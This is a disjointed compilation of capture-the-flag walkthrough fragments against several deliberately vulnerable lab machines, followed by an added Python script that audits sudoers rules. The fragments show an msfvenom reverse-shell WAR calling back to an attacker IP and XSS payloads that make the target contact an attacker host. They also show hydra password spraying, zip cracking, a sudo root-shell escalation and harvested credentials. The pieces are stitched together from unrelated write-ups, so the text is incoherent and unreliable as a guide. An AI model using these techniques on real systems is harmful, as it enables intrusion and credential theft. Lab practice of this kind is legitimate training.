www-data@Milburg-High:/home/bob/Documents$ cat staff.txt
Seb:
Seems to like Elliot
Wants to do well at his job
Gave me a backdoored FTP to instal that apparently Elliot gave him
James:
Does nothing
Pretty Lazy
Doesn't give a shit about his job
Elliot:
Keeps to himself
Always needs to challenge everything I do
Keep an eye on him
Try and get him fired
www-data@Milburg-High:/home/bob/Documents$ ls
Secret login.txt.gpg staff.txt
www-data@Milburg-High:/home/bob/Documents$ cd Secret/
www-data@Milburg-High:/home/bob/Documents/Secret$ ls
Keep_Out
www-data@Milburg-High:/home/bob/Documents/Secret$ cd Keep_Out/
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ ls
Not_Porn Porn
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ cd Not_Porn/
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Not_Porn$ ls
No_Lookie_In_Here
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Not_Porn$ cd No_Lookie_In_Here/
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ ls
notes.sh
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ cat notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
But the current user has no permission, so this is not possible; I'll log in with the account credentials obtained earlier and try again.
www-data@Milburg-High:/home/bob/Documents$ su jc
Password:
jc@Milburg-High:/home/bob/Documents$ ls
login.txt.gpg Secret staff.txt
jc@Milburg-High:/home/bob/Documents$ gpg
gpg: keybox '/home/jc/.gnupg/pubring.kbx' created
gpg: WARNING: no command supplied. Trying to guess what you mean ...
gpg: Go ahead and type your message ...
^C
gpg: signal Interrupt caught ... exiting
jc@Milburg-High:/home/bob/Documents$ gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_
# bob Credentials
bob:b0bcat_
This user is allowed to use sudo.
Privilege Escalation
bob@Milburg-High:~$ sudo -l
sudo: unable to resolve host Milburg-High: Connection timed out
[sudo] password for bob:
Sorry, try again.
[sudo] password for bob:
Matching Defaults entries for bob on Milburg-High:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User bob may run the following commands on Milburg-High:
(ALL : ALL) ALL
ramses@NullByte:~$ cat .bash_history
sudo -s
su eric
exit
ls
clear
cd /var/www
cd backup/
ls
./procwatch
clear
sudo -s
cd /
ls
exit
ramses@NullByte:~$ sudo -l
[sudo] password for ramses:
Sorry, user ramses may not run sudo on NullByte.
ramses@NullByte:~$ cd /var/www
ramses@NullByte:/var/www$ ls
backup html
ramses@NullByte:/var/www$ cd backup
ramses@NullByte:/var/www/backup$ ls
procwatch readme.txt
ramses@NullByte:/var/www/backup$ ls -al
total 20
drwxrwxrwx 2 root root 4096 Aug 2 2015 .
drwxr-xr-x 4 root root 4096 Aug 2 2015 ..
-rwsr-xr-x 1 root root 4932 Aug 2 2015 procwatch
-rw-r--r-- 1 root root 28 Aug 2 2015 readme.txt
ramses@NullByte:/var/www/backup$ cat readme.txt
I have to fix this mess...
ramses@NullByte:/var/www/backup$ file procwatch
procwatch: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=17d666a0c940726b29feedde855535fb21cb160c, not stripped
ramses@NullByte:/var/www/backup$ ./procwatch
PID TTY TIME CMD
1598 pts/0 00:00:00 procwatch
1599 pts/0 00:00:00 sh
1600 pts/0 00:00:00 ps
ramses@NullByte:/var/www/backup$
The procwatch binary has the SUID bit set so that it runs with root privileges.
└─$ sudo nmap -p 111,51891,65535 -Pn -n --open -sV -sC -iL scope.txt -oA ./recon/tcpDetailed
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 02:54 EDT
Nmap scan report for 192.168.110.151
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 41558/tcp6 status
| 100024 1 44049/udp status
| 100024 1 51891/tcp status
|_ 100024 1 55652/udp6 status
51891/tcp open status 1 (RPC #100024)
65535/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
| ssh-hostkey:
| 1024 f3:53:9a:0b:40:76:b1:02:87:3e:a5:7a:ae:85:9d:26 (DSA)
| 2048 9a:a8:db:78:4b:44:4f:fb:e5:83:6b:67:e3:ac:fb:f5 (RSA)
| 256 c1:63:f1:dc:8f:24:81:82:35:fa:88:1a:b8:73:40:24 (ECDSA)
|_ 256 3b:4d:56:37:5e:c3:45:75:15:cd:85:00:4f:8b:a8:5e (ED25519)
MAC Address: 00:0C:29:FB:15:58 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.13 seconds
Information obtained:
Peter:inthesource
It terminated immediately, so I'll run the port scan again.
└─$ sudo nmap -p- -iL scope.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 03:08 EDT
Nmap scan report for 192.168.110.151
Host is up (0.0023s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
51891/tcp open unknown
65535/tcp open unknown
MAC Address: 00:0C:29:FB:15:58 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 16.99 seconds
It seems that entering the password triggers port 80 to open.
Let's connect and continue gathering information.
HTTP
Nothing notable in the page source or robots.txt.
I'll run directory brute-forcing with gobuster.
Vulnerability
Adding the /blog path, I run directory brute-forcing once more.
Nothing notable in /smilies.
There is a folder called tinymce.
When I looked at the website earlier there seemed to be nothing worth exploiting,
so I search for vulnerabilities in blogphp.
Exploitation
There are vulnerabilities allowing XSS and SQL injection; there is also code for CVE-2008-6745.
First I'll try to obtain a shell on the target host using the XSS.
On register.html, I register with the username set to <img src="http://192.168.110.129:2222">.
Before that, I need to start listening with nc, right?
└─$ nc -lvp 2222
This way the request is received. The website keeps waiting. Having tested that,
I'll now try to obtain a shell on the target host using Metasploit.
This time I create a user with <iframe src="http://192.168.110.129:2345"></iframe>.
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set srvhost 192.168.110.129
srvhost => 192.168.110.129
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set srvport 1234
srvport => 1234
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set uripath /
uripath => /
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set lport 3333
lport => 3333
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > exploit
To explain this process:
1. Use the target host's XSS vulnerability to make it connect to nc listening on the attacker PC.
2. Use the nc listening on the attacker PC to obtain a shell on the target host.
That's about it.
However, an error occurred, so I'll wrap up here with just an understanding of the technique.
I'll try again next time.
Since SQL injection is possible, I used sqlmap as in the code below to obtain the hashed password of the admin account, then cracked the MD5 hash and obtained admin access.
# ftp - 21
└─$ ftp 192.168.110.140
Connected to 192.168.110.140.
550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00421 Service not available, remote server has closed connection.
ftp> ls
Not connected.
# smtp - 25
└─$ telnet 192.168.110.140 25
Trying 192.168.110.140...
Connected to 192.168.110.140.
Escape character is '^]'.
550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00Connection closed by foreign host.
# mount
└─$ showmount -e 192.168.110.140
clnt_create: RPC: Unable to receive
# smb - 445
└─$ smbclient -L 192.168.110.140
Protocol negotiation to server 192.168.110.140 (for a protocol between LANMAN1 and SMB3) failed: NT_STATUS_CONNECTION_RESET
With the credentials obtained, I access /_M@nag3Me/html. The port is 8443 of course, keep that in mind, and you must prefix it with https!
Now it's time to attack.
Once in this Tomcat manager page, uploading a WAR file containing a reverse shell gives a reverse shell.
Exploitation
I generate the payload with msfvenom.
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=7777 -f war -o revshell.war
Payload size: 1098 bytes
Final size of war file: 1098 bytes
Saved as: revshell.war
# reverse shell listening
└─$ nc -nlvp 7777
listening on [any] 7777 ...
Click /revshell!
Initial foothold on the target host achieved.
Post-Exploitation
Looking around, I found the directory /var/www/5446 with 777 permissions, and obtained database information from a PHP file.
tomcat6@Breach:/var/www/5446$ cat 0d93f85c5061c44cdffeb8381b2772fd.php
<?php
/**
* All information in order to connect to database are going through here.
*
* Be careful if you are changing data's in this file.
*
* @copyright http://www.xoops.org/ The XOOPS Project
* @copyright XOOPS_copyrights.txt
* @copyright http://www.impresscms.org/ The ImpressCMS Project
* @license http://www.gnu.org/licenses/old-licenses/gpl-2.0.html GNU General Public License (GPL)
* @package installer
* @since 1.0
* @author marcan <marcan@impresscms.org>
* @author Sina Asghari (aka stranger) <pesian_stranger@users.sourceforge.net>
* @version $Id: sdata.dist.php 8570 2009-04-11 13:15:53Z icmsunderdog $
*/
// Database Hostname
// Hostname of the database server. If you are unsure, 'localhost' works in most cases.
define( 'SDATA_DB_HOST', 'localhost' );
// Database Username
// Your database user account on the host
define( 'SDATA_DB_USER', 'root' );
// Database Password
// Password for your database user account
define( 'SDATA_DB_PASS', '' );
// Database Name
// The name of database on the host. The installer will attempt to create the database if not exist
define( 'SDATA_DB_NAME', 'impresscms' );
// Table Prefix
// This prefix will be added to all new tables created to avoid name conflict in the database. If you are unsure, just use the default 'icms'
define( 'SDATA_DB_PREFIX', 'ia44db101' );
// Password Salt Key $mainSalt
// This salt will be appended to passwords in the icms_encryptPass() function.
// Do NOT change this once your site is Live, doing so will invalidate everyones Password.
define( 'SDATA_DB_SALT', 'EQ9eLioElpacrtYZFQrGiDvB5OQGXzq2jfA4okdsZzkVNGhka6blxUTrozLOuFSA4' );
?>
No password!! Let's connect.
tomcat6@Breach:/var/www/5446$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 104
Server version: 5.5.49-0ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| impresscms |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.03 sec)
mysql> use mysql;
mysql> show tables;
mysql> select Host,User,Password from user;
+-----------+------------------+-------------------------------------------+
| Host | User | Password |
+-----------+------------------+-------------------------------------------+
| localhost | root | |
| | milton | 6450d89bd3aff1d893b85d3ad65d2ec2 |
| 127.0.0.1 | root | |
| ::1 | root | |
| localhost | debian-sys-maint | *A9523939F1B2F3E72A4306C34F225ACF09590878 |
+-----------+------------------+-------------------------------------------+
5 rows in set (0.00 sec)
milton@Breach:~$ cat /usr/share/cleanup/tidyup.sh
#!/bin/bash
#Hacker Evasion Script
#Initech Cyber Consulting, LLC
#Peter Gibbons and Michael Bolton - 2016
#This script is set to run every 3 minutes as an additional defense measure against hackers.
cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf
This script runs every 3 minutes. But there is no write permission on it, so I need to find another file that is writable.
└─$ sudo nmap -sn 192.168.45.0/24
Nmap scan report for 192.168.45.124
Host is up (0.00036s latency).
MAC Address: 08:00:27:C0:50:B6 (Oracle VirtualBox virtual NIC)
This one feels like it will be mostly web hacking.
HTTP - 80, 8008
First I connect to port 80.
It says the system has an error. Nick..
Information found in comments in the page source:
<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal. Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8-->
<!--Comment from Richard: Ah! How could I forget? Thanks-->
The backup is in Tom's home directory, and Tom is storing important information in the company blog.
They also made a directory named after the place of the big fight, and there's a YouTube link.
The place identified from the YouTube video:
/prehistoricforest
Next, I check /robots.txt.
All the directories contain pictures; nothing notable.
And here is the first flag. There are said to be 5.
1/5 - B34rcl4ws
Now I connect to port 8008.
Nothing notable on the port 8008 website at first glance.
Vulnerability
First I run directory brute-forcing with gobuster and a scan for potential vulnerabilities with nikto.
80
The reason I only printed 200 responses during directory brute-forcing is that brute-forcing with the wordlist returned 301 for everything; nikto gave the same result. So I visited directly.
All the directories are created like this.
In that case, I first go to the /prehistoricforest path from the earlier clue.
Oh, it's the Callahan employee blog, built on WordPress.
I get user information with wpscan and take a look at the blog.
#username
tommy
richard
tom
Tom Jr.
Big Tom
michelle
Earlier it was said that a lot of important information is entered in the blog, right? And what's in the /richard directory is supposed to jog someone's memory... So I download it and check.
Michelle/Tommy,
This is f’d up.
I am currently working to restore the company’s online ordering system, but we are having some problems getting it restored from backup. Unfortunately, only Big Tom had the passwords to log into the system. I can’t find his passwords anywhere. All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying:
Hey Richy,
So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster.
Here’s everything I know:
You guys are all hopeless sheep :-/
The Callahan Auto Web site is usually pretty stable. But if for some reason the page is ever down, you guys will probably go out of business. But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again.
IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore. Warning: Big Tom always forgets his account password. Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called. Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.
I left a few other bits of information in my home folder, which the new guy can access via FTP. Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it. Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for. And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again. Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).
You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password. I removed my SSH access because I *DON’T* want you calling me in case of an emergency. But my creds still work on FTP. Your new fresh fish can connect using my credentials and if he/she has half a brain.
Good luck, schmucks!
LOL
-Nick
Michelle/Tommy…WTF are we going to do?!?! If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!!
-Richard
Hmm... first, SSH must be used with the Big Tom account.
Nick's home directory contains other information.
Renaming the backup file callahanbak.bak to index.html will make the site work normally.
There is an unstable FTP server: available for 15 minutes at the top of each hour, then offline for 15 minutes.
I obtained Tom's password, but the earlier letter said the username differs from the name he actually uses.
So, the other route is to use FTP; I rerun the port scan with nmap.
Looks like it's port 65534.
Since it was said a simple password is used, I write a small list.
└─$ cat ftp_pw.txt
password
pass
password123!
nick
nickburns
Then I run a password-spraying attack with hydra.
There's not much time!!
# Credentials
nickburns:nickburns
└─$ ftp 192.168.45.124 65534
Connected to 192.168.45.124.
220 Callahan_FTP_Server 1.3.5
Name (192.168.45.124:kali): nickburns
331 Password required for nickburns
Password:
230 User nickburns logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||26591|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 nickburns nickburns 977 Jul 15 2016 readme.txt
226 Transfer complete
ftp> get readme.txt
local: readme.txt remote: readme.txt
229 Entering Extended Passive Mode (|||43711|)
150 Opening BINARY mode data connection for readme.txt (977 bytes)
100% |****************************************************************************************************************| 977 16.13 KiB/s 00:00 ETA
226 Transfer complete
977 bytes received in 00:00 (15.67 KiB/s)
└─$ cat readme.txt
To my replacement:
If you're reading this, you have the unfortunate job of taking over IT responsibilities
from me here at Callahan Auto. HAHAHAHAHAAH! SUCKER! This is the worst job ever! You'll be
surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine
from a flame thrower!
Anyway I'm not completely without mercy. There's a subfolder called "NickIzL33t" on this server
somewhere. I used it as my personal dropbox on the company's dime for years. Heh. LOL.
I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want
to look at on your phone later, consider that folder my gift to you.
Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted
.zip of his passwords and put them in the "NickIzL33t" folder as well. But guess what?
He always forgets THAT password as well. Luckily I'm a nice guy and left him a hint sheet.
Good luck, schmuck!
LOL.
-Nick
There is a directory called NickIzL33t somewhere on the server, and since Big Tom always forgets his passwords, they were put in an encrypted .zip file.
Still the same...
Since it mentions Steve Jobs, I use a proxy tool to change the User-Agent to iOS and proceed.
Heh, I only found a clue to look for the .html extension.
So I need to find something, and I'll use the ffuf tool, which has an option to change the User-Agent.
Big Tom,
Your password vault is protected with (yep, you guessed it) a PASSWORD!
And because you were choosing stupidiculous passwords like "password123" and "brakepad" I
enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!!
Your password is your wife's nickname "bev" (note it's all lowercase) plus the following:
* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters
Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one
big chunk ok? Heh, "big chunk." A big chunk typing big chunks. That's funny.
LOL
-Nick
I made a password list and will use a tool called fcrackzip to crack the zip file's password.
While the tool is running, thinking again about what I'm doing:
I need to SSH in as Big Tom; I got the password from WordPress, but the user was not created with a consistent username, so the account exists under a name different from the blog's, and I'm currently looking for that username.
# Credentials
tom(?):1938!!
└─$ fcrackzip -v -u -D -p unzip_pw.txt ./t0msp4ssw0rdz.zip
found file 'passwords.txt', (size cp/uc 332/ 641, flags 9, chk 9aad)
checking pw bevG72kn~1995
PASSWORD FOUND!!!!: pw == bevH00tr$1995
└─$ unzip t0msp4ssw0rdz.zip
Archive: t0msp4ssw0rdz.zip
[t0msp4ssw0rdz.zip] passwords.txt password:
inflating: passwords.txt
┌──(kali㉿kali)-[~/vulnhub/tommyboy]
└─$ cat passwords.txt
Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money
TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding
Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat
Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.
Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.
What I need to know is the Auto Server username.
Combining it with 1938!!, I try SSH.
bigtommysenior:fatguyinalittlecoat1938!!
Initial foothold on the target host achieved.
Finally, Big Tom's account is taken over.
Post-Exploitation
bigtommysenior@CallahanAutoSrv01:~$ cat el-flag-numero-quatro.txt
YAY! Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.
Flag data: EditButton
But...but...where's flag 5?
I'll make it easy on you. It's in the root of this server at /5.txt
4/5 - EditButton
The 5th flag is said to be at /5.txt.
Earlier it was said that moving the backup file to /var/www/html/index.html makes the website work normally, so let's try it.
└─$ cat journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?
Anyway. Here it is:
FLAG: {131333} - 20 Points
80/130
└─$ chmod +x safe
└─$ ./safe
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
Using crunch, I generate words containing one uppercase letter and one digit, then combine the two generated lists and run a password-spraying attack with hydra.
└─$ crunch 7 7 -t ,%Flesh -o ./flesh.txt
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
crunch: 100% completed generating output
┌──(kali㉿kali)-[~/vulnhub/rick]
└─$ crunch 10 10 -t ,%Curtains -o ./curtains.txt
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
crunch: 100% completed generating output
┌──(kali㉿kali)-[~/vulnhub/rick]
└─$ cat flesh.txt > passwd.txt
┌──(kali㉿kali)-[~/vulnhub/rick]
└─$ cat curtains.txt >> passwd.txt
└─$ cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
# private key
└─$ cat key.txt
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4
2xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cO
...
...
...
a4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o
-----END RSA PRIVATE KEY-----
└─$ chmod 600 key.txt
└─$ ssh -i key.txt stinky@192.168.45.206
Found a pcap file -> started a web server with python on the target host and transferred the file to the attacker's Kali.
Looking at the packet where user mrderp logs in at /weblog/wp-login.php, I was able to obtain the account credentials.
# Credentials
mrderp:derpderpderpderpderpderpderp
The binary configured in sudo does not exist in mrderp's home directory.
I create a script that runs the /bin/bash binary and run it through sudo to obtain root privileges.
mrderp@DeRPnStiNK:~$ mkdir binaries; cd binaries
mrderp@DeRPnStiNK:~/binaries$ echo '/bin/bash' > derpy.sh; chmod +x derpy.sh
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh
root@DeRPnStiNK:~/binaries# id; hostname; ip a
uid=0(root) gid=0(root) groups=0(root)
DeRPnStiNK
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 08:00:27:11:4d:a8 brd ff:ff:ff:ff:ff:ff
inet 192.168.45.206/24 brd 192.168.45.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe11:4da8/64 scope link
valid_lft forever preferred_lft forever
root@DeRPnStiNK:/root/Desktop# ls
flag.txt
root@DeRPnStiNK:/root/Desktop# cat flag.txt
flag4(.....)
Congrats on rooting my first VulnOS!
Hit me up on twitter and let me know your thoughts!
@securekomodo
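As an added example (not part of the walkthrough or any of these VMs), here is a small defender-side audit over sudoers-style rules that flags the weakness abused above: a rule granting sudo on a command path inside a user-writable directory (such as a script under the user's own home), an unrestricted ALL, or a wildcard in the arguments. The sudoers lines it checks are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sudoers excerpt (not taken from any real host). The mrderp line
# mirrors the situation in the DeRPnStiNK walkthrough: sudo is granted on a
# script path under the user's own home directory, so the user can put any
# content into that script and run it as root.
SAMPLE_SUDOERS = """\
# /etc/sudoers excerpt (constructed)
Defaults        env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
mrderp  ALL=(ALL) /home/mrderp/binaries/derpy.sh
nitish  ALL=(sam) NOPASSWD: /usr/bin/genie
sam     ALL=(root) NOPASSWD: /root/lago
bob     ALL=(ALL : ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync *
"""

# Directory prefixes an unprivileged user can normally write to.
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

# user  host=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


@dataclass
class Finding:
    user: str
    command: str
    reason: str


def parse_rules(text):
    """Yield (user, nopasswd, command) for every user-spec line in the text."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue  # aliases and other directives are out of scope here
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            yield m.group("user"), nopasswd, cmd.strip()


def audit_sudoers(text):
    """Flag rules that let a non-root user run arbitrary commands as root."""
    findings = []
    for user, nopasswd, cmd in parse_rules(text):
        if user == "root":
            continue
        suffix = " (NOPASSWD)" if nopasswd else ""
        if cmd == "ALL":
            findings.append(Finding(user, cmd, "unrestricted ALL" + suffix))
            continue
        path = cmd.split()[0]
        if path.startswith(USER_WRITABLE_PREFIXES):
            findings.append(Finding(user, cmd, "command in user-writable directory" + suffix))
        if "*" in cmd:
            findings.append(Finding(user, cmd, "wildcard in command arguments" + suffix))
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f.user:8s} {f.command:40s} {f.reason}")
```

The same check can be run over the real file with `audit_sudoers(open("/etc/sudoers").read())`; the fix for the mrderp-style finding is to move the permitted script to a root-owned, non-writable path.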
It was filtering various strings. And here is creds.txt from the .dev directory:
# credentials
nitish:p4ssw0rdStr3r0n9
I tried to access it over SSH, but the port was filtered, right??
Port knocking seems to be possible.
I attempt port knocking from the attacker PC.
Now it's open!!
Privilege Escalation
The flag value from user.txt.
Now it's time for privilege escalation.
nitish@djinn:~$ sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
$ sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
Looks like I need to guess or find something... This CTF is made to be fun. I go to sam's home directory to check for clues.
$ pwd
/home/sam
$ ls -al
total 36
drwxr-x--- 4 sam sam 4096 Nov 14 2019 .
drwxr-xr-x 4 root root 4096 Nov 14 2019 ..
-rw------- 1 root root 417 Nov 14 2019 .bash_history
-rw-r--r-- 1 root root 220 Oct 20 2019 .bash_logout
-rw-r--r-- 1 sam sam 3771 Oct 20 2019 .bashrc
drwx------ 2 sam sam 4096 Nov 11 2019 .cache
drwx------ 3 sam sam 4096 Oct 20 2019 .gnupg
-rw-r--r-- 1 sam sam 807 Oct 20 2019 .profile
-rw-r--r-- 1 sam sam 1749 Nov 7 2019 .pyc
-rw-r--r-- 1 sam sam 0 Nov 7 2019 .sudo_as_admin_successful
$ strings .pyc
getuser(
system(
randintc
Working on it!! (
/home/mzfr/scripts/exp.pyt
naughtyboi
Choose a number between 1 to 100: s
Enter your number: s
/bin/shs
Better Luck next time(
inputR
numt
/home/mzfr/scripts/exp.pyt
guessit
Enter the full of the file to read: s!
User %s is not allowed to read %s(
usert
path(
/home/mzfr/scripts/exp.pyt
readfiles
What do you want to do ?s
1 - Be naughtys
2 - Guess the numbers
3 - Read some damn filess
4 - Works
Enter your choice: (
intR
choice(
/home/mzfr/scripts/exp.pyt
options
work your ass off!!s"
Do something better with your life(
/home/mzfr/scripts/exp.pyt
main'
__main__N(
getpassR
randomR
__name__(
/home/mzfr/scripts/exp.pyt
<module>
I need to decompile the compiled pyc file to see what code it was built from. Feels like reversing.
# install uncompyle6, which decompiles pyc files
└─$ pip install uncompyle6
Start a web server on the target host.
$ python3 -m http.server 1234
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
# kali
└─$ wget http://192.168.45.195:1234/.pyc
--2024-07-11 18:32:47-- http://192.168.45.195:1234/.pyc
Connecting to 192.168.45.195:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1749 (1.7K) [application/octet-stream]
Saving to: ‘.pyc’
.pyc 100%[============================================================================>] 1.71K --.-KB/s in 0s
2024-07-11 18:32:47 (200 MB/s) - ‘.pyc’ saved [1749/1749]
└─$ uncompyle6 .pyc
# uncompyle6 version 3.9.1
# Python bytecode version base 2.7 (62211)
